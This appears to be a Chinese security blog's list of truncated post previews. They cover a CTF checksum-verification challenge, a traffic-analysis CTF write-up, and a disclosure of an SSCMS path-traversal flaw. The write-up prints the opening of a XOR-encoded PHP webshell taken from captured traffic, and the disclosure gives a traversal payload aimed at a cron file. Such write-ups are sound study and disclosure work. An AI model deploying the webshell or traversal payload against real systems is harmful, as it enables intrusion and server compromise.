EnergyGroup-DataSecurity-dataIntegrityVerification题目介绍1234567891011121314151617给定一个Excel 文件《data.xlsx》,其中包含多个数据列,每一列的数据代表某一类记录。文件中的数据可能在传输、存储或处理的过程中发生了丢失或篡改。参赛选手需要对文件中的数据进行完整性校验,识别哪些列中的数据存在完整性问题,并输出校验结果。A列B列的数据在文件生成时有对应的一列校验和(Checksum)数据。参赛选手需要根据原始数据列计算校验和,并与文件中的校验和列进行比较。如果两者不一致,则认为该行的数据存在完整性问题。参赛选手需要根据校验列推导使用的校验算法并编写程序对数据进行校验,并输出识别结果。输出格式“A列-不匹配的行数;B列-不匹配的行数”。请参赛选手编写程序对《data.xlsx》中的A列B列数据进行完整性校验,构造上述格式的答案,并将答案的 MD5 值(MD5 值英文字符全小写,长度 32 个字符;计算答案的 MD5 值时,用 UTF-8 字符编码)提交至平台。正确答案示例:A列-30;B列-40,提...
流量分析flag1
题干找的上传是压缩包,筛选包内POST或PUT流量
http.request.method==POST||http.request.method==PUT
其中 No.13038 的key.png是 PK 头,但不是个加密的压缩包
13110是个简单的shell,导出如下
12345678910111213141516171819202122232425262728293031<?php@session_start();@set_time_limit(0);@error_reporting(0);function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D;}$pass='suger';$payloadName='payload';$key='a5717a6...
此处用户传入的 RelatedFileName 参数没有进行路径遍历字符的过滤或清洗,导致持有 /api/admin/cms/templates/templatesEditor/actions/settings 接口访问权限的用户,可以构造如 "relatedFileName":"/../../../../../../../../.././etc/cron.d/e2scrub_all" 进行传参,请求的中 relatedFileName 参数将会进入到如下位置。
cms/src/SSCMS.Web/Controllers/Admin/Cms/Templates/TemplatesEditorController.Settings.cs
在 TemplatesEditorController.Settings.cs 的 L100,含有路径穿越的内容的 RelatedFileName 的值又赋给了 template.RelatedFileName 中,然后 templ...